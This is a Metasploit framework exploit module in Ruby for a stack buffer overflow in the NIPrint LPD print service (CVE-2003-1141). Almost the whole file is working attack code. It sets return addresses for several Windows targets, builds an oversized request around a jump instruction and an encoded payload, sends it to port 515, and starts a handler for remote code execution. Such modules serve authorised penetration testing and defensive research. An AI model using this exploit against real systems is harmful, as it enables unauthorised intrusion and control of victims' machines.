##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NIPrint LPD Request Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the
        Network Instrument NIPrint LPD service. Inspired by
        Immunity's VisualSploit :-)
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2003-1141'],
          ['OSVDB', '2774'],
          ['BID', '8968'],
          ['URL',   'http://www.immunitysec.com/documentation/vs_niprint.html'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi
          ['Windows XP SP3', { 'Ret' => 0x7C9D30E3 }],
          ['Windows 7 x64', { 'Ret' => 0x763B35DD }],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Nov 05 2003'))

    register_options(
      [
        Opt::RPORT(515)
      ])
  end

  def exploit
    connect

    req = rand_text_alphanumeric(8192)
    req[  0, 2] = "\xeb\x33"
    req[ 49, 4] = [target.ret].pack('V')
    req[ 53, payload.encoded.length ] = payload.encoded

    print_status("Trying target #{target.name}...")
    sock.put(req)

    handler
    disconnect
  end
end
